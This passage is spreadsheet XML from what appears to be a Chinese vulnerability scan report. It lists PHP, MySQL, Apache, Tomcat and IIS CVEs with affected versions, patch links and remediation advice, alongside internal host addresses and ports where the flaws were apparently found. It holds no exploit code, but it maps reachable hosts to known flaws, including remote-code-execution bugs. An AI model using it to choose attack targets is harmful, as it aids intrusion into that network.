  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=67717
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_26142&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP代码注入漏洞(CVE-2016-6174)</t>
  </si>
  <si>
    <t>影响PHP:5.4.23以下版本,5.5版本(含)到5.5.8版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.php.net/downloads</t>
  </si>
  <si>
    <t>PHP \"gdImageCreateFromXpm()\"空指针间接引用漏洞(CVE-2014-2497)</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.26版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/patch-display.php?bug_id=66901&amp;patch=bug66901-fix.patch&amp;revision=latest</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201403-403
https://bugs.php.net/bug.php?id=66901</t>
  </si>
  <si>
    <t>PHP释放后重利用远程代码执行漏洞(CVE-2015-0273)</t>
  </si>
  <si>
    <t>ips-11020713（有效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=fbf3a6bc1abcc8a5b5226b0ad9464c37f11ddbd6</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-047
http://www.securitytracker.com/id/1031945</t>
  </si>
  <si>
    <t>PHP‘phar_rename_archive’函数释放后重用漏洞(CVE-2015-2301)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-624
https://support.apple.com/HT205267</t>
  </si>
  <si>
    <t>PHP PHAR 'phar_tar_process_metadata()'函数堆内存破坏漏洞(CVE-2015-3307)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=68741</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-312
https://support.apple.com/kb/HT205031</t>
  </si>
  <si>
    <t>PHP 'pcnt_exec()'函数空字符安全限制绕过漏洞(CVE-2015-4026)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-132
https://bugs.php.net/bug.php?id=68598</t>
  </si>
  <si>
    <t>PHP 'php_var_unserialize()'函数释放后重利用远程代码执行漏洞(CVE-2015-6835)</t>
  </si>
  <si>
    <t>ips-11020759, ips-11024085（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201509-239
http://www.securitytracker.com/id/1033548</t>
  </si>
  <si>
    <t>PHP serialize_function_call类型混淆漏洞(CVE-2015-6836)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=70219</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201509-232
http://www.securitytracker.com/id/1033548</t>
  </si>
  <si>
    <t>PHP‘do_soap_call’函数输入验证漏洞(CVE-2015-4148)</t>
  </si>
  <si>
    <t>影响PHP:5.4.38以下版本(含),5.5.0版本(含)到5.5.22版本(含),5.6.0版本(含)到5.6.6版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-133
https://bugs.php.net/bug.php?id=69085</t>
  </si>
  <si>
    <t>PHP‘SoapClient's __call()’函数代码注入漏洞(CVE-2015-4147)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-107
http://www.securitytracker.com/id/1032459</t>
  </si>
  <si>
    <t>PHP ‘phar_make_dirstream’函数拒绝服务漏洞(CVE-2016-4343)</t>
  </si>
  <si>
    <t>ips-11020697（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.6.17以下版本(含),7.0.0版本(含)到7.0.2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=71488</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-628</t>
  </si>
  <si>
    <t>PHP exif_process_IFD_TAG拒绝服务漏洞(CVE-2016-4542)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-155
https://security.gentoo.org/glsa/201611-22</t>
  </si>
  <si>
    <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-151
https://bugs.php.net/bug.php?id=72061</t>
  </si>
  <si>
    <t>PHP php_url_parse_ex拒绝服务漏洞(CVE-2016-6288)</t>
  </si>
  <si>
    <t>影响PHP:5.5.37以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://support.apple.com/zh-cn/HT206564https://support.apple.com/zh-cn/HT206568https://support.apple.com/zh-cn/HT206567</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-926
https://bugs.php.net/70480</t>
  </si>
  <si>
    <t>PHP ext/session/session.c拒绝服务漏洞(CVE-2016-6290)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-928
https://bugs.php.net/72562</t>
  </si>
  <si>
    <t>PHP ext/snmp/snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-933
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-934
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP php_stream_zip_opener函数整数溢出漏洞(CVE-2016-6297)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-935
https://support.apple.com/HT207170</t>
  </si>
  <si>
    <t>PHP 'php_html_entities()' 函数整数溢出漏洞(CVE-2016-5094)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-658
https://bugs.php.net/bug.php?id=72135</t>
  </si>
  <si>
    <t>PHP 'ext/standard/file.c' 远程拒绝服务漏洞(CVE-2016-5096)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-660
https://bugs.php.net/bug.php?id=72114</t>
  </si>
  <si>
    <t>PHP 'php_raw_url_encode()'函数整数溢出漏洞(CVE-2016-4070)</t>
  </si>
  <si>
    <t>影响PHP:5.5.34以下版本,5.6.0版本(含)到5.6.20版本,7.0.0版本(含)到7.0.5版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-557
https://bugs.php.net/bug.php?id=71798</t>
  </si>
  <si>
    <t>PHP ext/standard/var_unserializer.c拒绝服务漏洞(CVE-2016-7124)</t>
  </si>
  <si>
    <t>ips-11021981（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-075
http://php.net/ChangeLog-5.php#5.6.25</t>
  </si>
  <si>
    <t>PHP 'ext/zip/php_zip.c'释放后重利用远程代码执行漏洞(CVE-2016-5773)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-564
https://bugs.php.net/bug.php?id=72434</t>
  </si>
  <si>
    <t>PHP open_basedir安全漏洞（CVE-2010-3436）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=72434</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-096
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 内存破坏漏洞（CVE-2010-3710）</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.4版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.php.net/viewvc?view=revision&amp;revision=303824</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201010-374
http://www.php.net/releases/5_3_4.php</t>
  </si>
  <si>
    <t>PHP ext/phar/stream.c和ext/phar/dirstream.c文件多个格式串漏洞</t>
  </si>
  <si>
    <t>厂商补丁：PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://svn.php.net/viewvc?view=revision&amp;revision=298667</t>
  </si>
  <si>
    <t>http://php-security.org/2010/05/14/mops-2010-028-php-phar_wrapper_open_url-format-string-vulnerabilities/index.htmlhttp://php-security.org/2010/05/14/mops-2010-027-php-phar_parse_url-format-string-vulnerabilities/index.htmlhttp://php-security.org/2010/05/14/mops-2010-026-php-phar_wrapper_unlink-format-string-vulnerability/index.htmlhttp://php-security.org/2010/05/14/mops-2010-025-php-phar_wrapper_open_dir-format-string-vulnerability/index.htmlhttp://php-security.org/2010/05/14/mops-2010-024-php-phar_stream_flush-format-string-vulnerability/index.html
http://php-security.org/2010/05/14/mops-2010-028-php-phar_wrapper_open_url-format-string-vulnerabilities/index.htmlhttp://php-security.org/2010/05/14/mops-2010-027-php-phar_parse_url-format-string-vulnerabilities/index.htmlhttp://php-security.org/2010/05/14/mops-2010-026-php-phar_wrapper_unlink-format-string-vulnerability/index.htmlhttp://php-security.org/2010/05/14/mops-2010-025-php-phar_wrapper_open_dir-format-string-vulnerability/index.htmlhttp://php-security.org/2010/05/14/mops-2010-024-php-phar_stream_flush-format-string-vulnerability/index.html
http://www.php.net/releases/5_3_4.php
https://bugzilla.redhat.com/show_bug.cgi?id=598537</t>
  </si>
  <si>
    <t>PHP Stream组件远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>PHP Fileinfo组件file 输入验证漏洞(CVE-2014-9653)</t>
  </si>
  <si>
    <t>影响PHP:5.4.37以下版本,5.5版本(含)到5.5.21版本,5.6版本(含)到5.6.5版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
http://mx.gw.com/pipermail/file/2014/001649.html
http://openwall.com/lists/oss-security/2015/02/05/13
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490
https://www.smacktls.com/#freak
https://www.openssl.org/news/secadv/20150319.txt
https://www.openssl.org/news/secadv/20150108.txt</t>
  </si>
  <si>
    <t>PHP iconv_mime_decode_headers函数远程未明漏洞(CVE-2010-4699)</t>
  </si>
  <si>
    <t>www.php.net
http://www.php.net/ChangeLog-5.php
http://coding.derkeiler.com/Archive/PHP/php.general/2007-04/msg00605.html
http://bugs.php.net/52941</t>
  </si>
  <si>
    <t>PHP-CGI远程源码泄露和任意代码执行漏洞（CVE-2012-1823）</t>
  </si>
  <si>
    <t>ips-11020758, ips-11023294, ips-11023390（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.3.12版本,5.4版本(含)到5.4.2版本</t>
  </si>
  <si>
    <t>临时解决方法：使用Mod_Rewrite来过滤请求：RewriteRule规则如下RewriteEngine onRewriteCond %{QUERY_STRING ^[^=]*$RewriteCond %{QUERY_STRING %2d|\- [NC]RewriteRule .? - [F,L]厂商补丁：PHP---目前厂商已经在5.3.13及5.4.3两个版本中修复了这个安全问题，请密切关注厂商网站下载最新版本：http://www.php.net</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2013-4635)</t>
  </si>
  <si>
    <t>ips-11021951（无效）</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.26版本,5.4.0版本(含)到5.4.16版本</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>http://192.168.4.253:5357</t>
  </si>
  <si>
    <t>5357</t>
  </si>
  <si>
    <t>PHP Sessions子系统会话固定漏洞(CVE-2011-4718)</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.5.1版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://wiki.php.net/rfc/strict_sessions</t>
  </si>
  <si>
    <t>http://git.php.net/?p=php-src.git;a=commit;h=25e8fcc88fa20dc9d4c47184471003f436927cdehttp://git.php.net/?p=php-src.git;a=commit;h=169b78eb79b0e080b67f9798708eb3771c6d0b2fhttps://wiki.php.net/rfc/strict_sessions
http://git.php.net/?p=php-src.git;a=commit;h=25e8fcc88fa20dc9d4c47184471003f436927cdehttp://git.php.net/?p=php-src.git;a=commit;h=169b78eb79b0e080b67f9798708eb3771c6d0b2fhttps://wiki.php.net/rfc/strict_sessions
https://bugs.php.net/bug.php?id=60491</t>
  </si>
  <si>
    <t>PHP多个内存破坏漏洞（CVE-2015-4601）</t>
  </si>
  <si>
    <t>PHP 'incomplete_class.c' 内存破坏漏洞（CVE-2015-4602）</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commitdiff;h=fb83c76deec58f1fab17c350f04c9f042e5977d1</t>
  </si>
  <si>
    <t>PHP 'phar_fix_filepath()'函数栈缓冲区溢出漏洞（CVE-2015-5590）</t>
  </si>
  <si>
    <t>厂商补丁：PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>PHP 释放后重利用漏洞(CVE-2015-6832)</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://bugs.php.net/bug.php?id=70068http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP SPL 释放后重利用漏洞(CVE-2015-6831)</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://bugs.php.net/bug.php?id=70169https://bugs.php.net/bug.php?id=70155https://bugs.php.net/bug.php?id=70166https://bugs.php.net/bug.php?id=70168 http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP Zend/zend_exceptions.c拒绝服务漏洞(CVE-2015-8873)</t>
  </si>
  <si>
    <t>http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28feahttp://php.net/ChangeLog-5.phphttps://bugs.php.net/bug.php?id=69793
http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28feahttp://php.net/ChangeLog-5.phphttps://bugs.php.net/bug.php?id=69793</t>
  </si>
  <si>
    <t>PHP ext/mysqlnd/mysqlnd.c中间人漏洞(CVE-2015-8838)</t>
  </si>
  <si>
    <t>影响PHP:5.4.42以下版本(含),5.5.0版本(含)到5.5.26版本(含),5.6.0版本(含)到5.6.10版本(含)</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.phphttp://git.php.net/?p=php-src.git;a=commit;h=97aa752fee61fccdec361279adbfb17a3c60f3f4https://bugs.php.net/bug.php?id=69669
http://php.net/ChangeLog-5.phphttp://git.php.net/?p=php-src.git;a=commit;h=97aa752fee61fccdec361279adbfb17a3c60f3f4https://bugs.php.net/bug.php?id=69669</t>
  </si>
  <si>
    <t>PHP make_http_soap_request函数信息泄露及拒绝服务漏洞(CVE-2016-3185)</t>
  </si>
  <si>
    <t>影响PHP:5.4.43以下版本(含),5.5.0版本(含)到5.5.27版本(含),5.6.0版本(含)到5.6.11版本(含),7.0.0版本(含)到7.0.3版本(含)</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=70081http://php.net/ChangeLog-5.phphttps://git.php.net/?p=php-src.git;a=commit;h=eaf4e77190d402ea014207e9a7d5da1a4f3727ba
https://bugs.php.net/bug.php?id=70081http://php.net/ChangeLog-5.phphttps://git.php.net/?p=php-src.git;a=commit;h=eaf4e77190d402ea014207e9a7d5da1a4f3727ba</t>
  </si>
  <si>
    <t>PHP fileinfo组件远程拒绝服务漏洞(CVE-2014-3478)</t>
  </si>
  <si>
    <t>PHP≤5.4.295.5.0≤PHP&lt;5.5.14</t>
  </si>
  <si>
    <t>http://www.php.net/ChangeLog-5.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_26352&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2016-10712）</t>
  </si>
  <si>
    <t>PHP &lt; 5.5.315.6.0 &lt;= PHP &lt; 5.6.177.0.0 &lt;= PHP &lt; 7.0.2</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://bugs.php.net/bug.php?id=71323</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2016-10712</t>
  </si>
  <si>
    <t>http://192.168.4.207:80/</t>
  </si>
  <si>
    <t>http://192.168.4.219:8080</t>
  </si>
  <si>
    <t>http://192.168.4.219:80</t>
  </si>
  <si>
    <t>http://192.168.4.219:8080/</t>
  </si>
  <si>
    <t>http://192.168.4.219:80/</t>
  </si>
  <si>
    <t>http://192.168.4.219:8080/v2/api-docs</t>
  </si>
  <si>
    <t>http://192.168.4.217:5001</t>
  </si>
  <si>
    <t>5001</t>
  </si>
  <si>
    <t>http://192.168.4.217:8001</t>
  </si>
  <si>
    <t>8001</t>
  </si>
  <si>
    <t>https://192.168.4.200:2381</t>
  </si>
  <si>
    <t>http://192.168.4.200:2301</t>
  </si>
  <si>
    <t>2301</t>
  </si>
  <si>
    <t>目标主机上SMB服务允许匿名登陆</t>
  </si>
  <si>
    <t>远程攻击者可以通过此漏洞获取敏感信息</t>
  </si>
  <si>
    <t>如果并不需要开放匿名SMB服务，您应该禁止匿名登录。Windows下设置方法：1.在 控制面板\所有控制面板项\网络和共享中心\高级共享设置中开启启用密码保护共享Linux下Samba设置方法：1.[global]标签下设置security=user2.[共享目录]标签下设置guest ok = no</t>
  </si>
  <si>
    <t>http://192.168.4.219:80/v2/api-docs</t>
  </si>
  <si>
    <t>http://192.168.4.200:10082</t>
  </si>
  <si>
    <t>http://192.168.4.208:80/</t>
  </si>
  <si>
    <t>Apache httpOnly Cookie 信息泄露漏洞(CVE-2012-0053)</t>
  </si>
  <si>
    <t>ips-11020629, ips-11021394, ips-11023935, ips-11023936, ips-11023937, ips-11023938, waf-11021394（无效）</t>
  </si>
  <si>
    <t>与其他攻击（例如,跨站脚本）联合使用时,此漏洞可造成 httpOnly cookie 泄露。</t>
  </si>
  <si>
    <t>请升级到 Apache 2.0.65 / 2.2.22 或更高版本。</t>
  </si>
  <si>
    <t>http://fd.the-wildcat.de/apache_e36a9cf46c.php
http://httpd.apache.org/security/vulnerabilities_22.html
http://svn.apache.org/viewvc?view=revision&amp;revision=1235454
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-403</t>
  </si>
  <si>
    <t>http://192.168.4.217:80</t>
  </si>
  <si>
    <t>http://192.168.4.217:8008</t>
  </si>
  <si>
    <t>8008</t>
  </si>
  <si>
    <t>http://192.168.4.217:5002</t>
  </si>
  <si>
    <t>5002</t>
  </si>
  <si>
    <t>SSL 证书到期</t>
  </si>
  <si>
    <t>SSL 的服务关联的证书的到期日期</t>
  </si>
  <si>
    <t>请购买或生成新的 SSL 证书以替换现有证书。</t>
  </si>
  <si>
    <t>Apache mod_negotiation文件名暴力破解漏洞</t>
  </si>
  <si>
    <t>https://192.168.4.200:2381/index</t>
  </si>
  <si>
    <t>可能导致信息泄露：目录列表，文件名暴力破解，备份文件。</t>
  </si>
  <si>
    <t>从Apache的配置文件中禁用MultiViews指令，然后重新启动Apache。您可以通过创建包含"Options -Multiviews"的.htaccess文件来禁用MultiViews。</t>
  </si>
  <si>
    <t>http://www.ush.it/2008/07/02/mod_negotiation-directory-listing-filename-bruteforcing/
http://www.wisec.it/sectou.php?id=4698ebdc59d15
http://httpd.apache.org/docs/2.2/mod/mod_negotiation.html</t>
  </si>
  <si>
    <t>http://192.168.4.217:80/</t>
  </si>
  <si>
    <t>http://192.168.4.217:8008/</t>
  </si>
  <si>
    <t>http://192.168.4.217:8001/</t>
  </si>
  <si>
    <t>http://192.168.4.217:5002/</t>
  </si>
  <si>
    <t>http://172.20.34.95:10082</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-22924)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.26版本(含),5.7.0版本(含)到5.7.35版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpuoct2021.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞(CVE-2021-22898)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.34版本(含),8.0.0版本(含)到8.0.25版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>Oracle Mysql  libcurl 缓冲区错误漏洞(CVE-2018-16890)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.15版本(含),5.7.0版本(含)到5.7.26版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>Oracle Mysql curl/libcURL整数溢出漏洞(CVE-2019-5435)</t>
  </si>
  <si>
    <t>厂商补丁:Mysql：升级Mysql 到最新版本https://www.mysql.com/cn/</t>
  </si>
  <si>
    <t>Oracle Mysql libcURL堆缓冲区溢出漏洞(CVE-2019-3823)</t>
  </si>
  <si>
    <t>厂商补丁:升级mysql 到最新版本https://www.mysql.com</t>
  </si>
  <si>
    <t>http://172.20.34.110:4388</t>
  </si>
  <si>
    <t>https://172.20.34.74:443</t>
  </si>
  <si>
    <t>http://172.20.34.74:80</t>
  </si>
  <si>
    <t>http://172.20.34.74:80/</t>
  </si>
  <si>
    <t>https://172.20.34.20:443</t>
  </si>
  <si>
    <t>http://172.20.34.20:80</t>
  </si>
  <si>
    <t>https://172.20.34.72:443</t>
  </si>
  <si>
    <t>http://172.20.34.20:80/</t>
  </si>
  <si>
    <t>http://172.20.34.72:80</t>
  </si>
  <si>
    <t>http://172.20.34.72:80/</t>
  </si>
  <si>
    <t>http://192.168.22.82:80</t>
  </si>
  <si>
    <t>http://192.168.22.82:80/</t>
  </si>
  <si>
    <t>http://192.168.22.201:80</t>
  </si>
  <si>
    <t>https://192.168.22.201:443</t>
  </si>
  <si>
    <t>https://192.168.22.30:443/</t>
  </si>
  <si>
    <t>http://192.168.22.24:80</t>
  </si>
  <si>
    <t>https://192.168.22.30:443</t>
  </si>
  <si>
    <t>http://192.168.22.30:80/</t>
  </si>
  <si>
    <t>https://172.20.34.71:443</t>
  </si>
  <si>
    <t>http://192.168.22.30:80</t>
  </si>
  <si>
    <t>http://172.20.34.71:80</t>
  </si>
  <si>
    <t>http://192.168.22.25:80</t>
  </si>
  <si>
    <t>http://172.20.34.71:80/</t>
  </si>
  <si>
    <t>http://192.168.22.81:80/</t>
  </si>
  <si>
    <t>https://192.168.22.24:443</t>
  </si>
  <si>
    <t>http://192.168.22.24:80/</t>
  </si>
  <si>
    <t>https://192.168.22.25:443</t>
  </si>
  <si>
    <t>http://192.168.22.33:80</t>
  </si>
  <si>
    <t>http://192.168.22.26:80/</t>
  </si>
  <si>
    <t>https://192.168.22.33:443</t>
  </si>
  <si>
    <t>http://192.168.22.33:80/</t>
  </si>
  <si>
    <t>http://192.168.22.25:80/</t>
  </si>
  <si>
    <t>https://192.168.22.26:443</t>
  </si>
  <si>
    <t>http://192.168.22.26:80</t>
  </si>
  <si>
    <t>https://192.168.22.31:4430</t>
  </si>
  <si>
    <t>4430</t>
  </si>
  <si>
    <t>https://192.168.22.31:443</t>
  </si>
  <si>
    <t>http://192.168.22.31:80/</t>
  </si>
  <si>
    <t>http://192.168.22.31:80</t>
  </si>
  <si>
    <t>https://192.168.22.60:1158</t>
  </si>
  <si>
    <t>http://192.168.22.60:80/</t>
  </si>
  <si>
    <t>IIS远程代码执行漏洞(CVE-2015-1635)</t>
  </si>
  <si>
    <t>ips-10010222（有效）</t>
  </si>
  <si>
    <t>http://192.168.22.60:80/iisstart.htm</t>
  </si>
  <si>
    <t>影响windows 7, windows 8, windows server 2008,windows server 2012上的IIS服务器。</t>
  </si>
  <si>
    <t>参见《IIS远程代码执行漏洞(CVE-2015-1635)-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/qq_40640917/article/details/122615505
https://www.catalog.update.microsoft.com/Search.aspx?q=3042553
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034
http://packetstormsecurity.com/files/131463/Microsoft-Windows-HTTP.sys-Proof-Of-Concept.html
https://www.exploit-db.com/exploits/36776/
https://www.exploit-db.com/exploits/36773/
https://technet.microsoft.com/en-us/library/cc731903(v=ws.10).aspx</t>
  </si>
  <si>
    <t>8099</t>
  </si>
  <si>
    <t>Apache Tomcat 拒绝服务漏洞</t>
  </si>
  <si>
    <t>Tomcat: 7.0.103</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.35版本(含),7.0.0版本(含)到7.0.105版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://jakarta.apache.org/tomcat/index.html</t>
  </si>
  <si>
    <t>https://support.juniper.net/support/downloads/?p=nsm#sw
https://kb.juniper.net/InfoCenter/index?page=content&amp;id=JSA10600
http://jakarta.apache.org/tomcat/index.html</t>
  </si>
  <si>
    <t>mysql: 5.0.18</t>
  </si>
  <si>
    <t>MySQL MERGE表再次访问权限饶过漏洞</t>
  </si>
  <si>
    <t>影响MySQL:3.20.0版本(含)到4.1.21版本,5.0.0版本(含)到5.0.24版本</t>
  </si>
  <si>
    <t>Apple Mac OS X Server 10.4Apple Mac OS X Server 10.4.1Apple Mac OS X Server 10.4.3Apple Mac OS X Server 10.4.4Apple Mac OS X Server 10.4.5Apple Mac OS X Server 10.4.7Apple Mac OS X Server 10.4.8MySQL AB MySQL 4.1.12</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200608-143
http://dev.mysql.com/doc/refman/4.1/en/news-4-1-21.html
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-24.html</t>
  </si>
  <si>
    <t>MySQL单行子选择远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.36版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.mysql.com</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200703-345</t>
  </si>
  <si>
    <t>MySQL SQL SECURITY INVOKER存储过程权限提升漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.1.0版本(含)到5.1.18版本,5.0.0版本(含)到5.0.40版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://dev.mysql.com/get/Downloads/MySQL-5.0/mysql-5.0.41.tar.gz/from/pickhttp://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.18-beta.tar.gz/from/pick</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200705-316
http://www.securitytracker.com/id?1018070</t>
  </si>
  <si>
    <t>MySQL命令行客户端HTML注入漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.4版本(含),5.0.18版本(含)到5.0.27版本(含),5.0.32版本(含)到5.0.33版本(含),5.0.36版本(含)到5.0.52版本(含),5.0.60版本,5.0.66版本,5.1.5版本(含)到5.1.6版本(含),5.1.9版本(含)到5.1.18版本(含),5.1.22版本(含)到5.1.23版本(含),5.1.26版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://bugs.mysql.com/file.php?id=9232</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200810-072
https://bugs.mysql.com/bug.php?id=27884</t>
  </si>
  <si>
    <t>MySQL sql_parse.cc远程格式串漏洞</t>
  </si>
  <si>
    <t>影响MySQL:4.0.0版本(含)到5.0.83版本(含)</t>
  </si>
  <si>
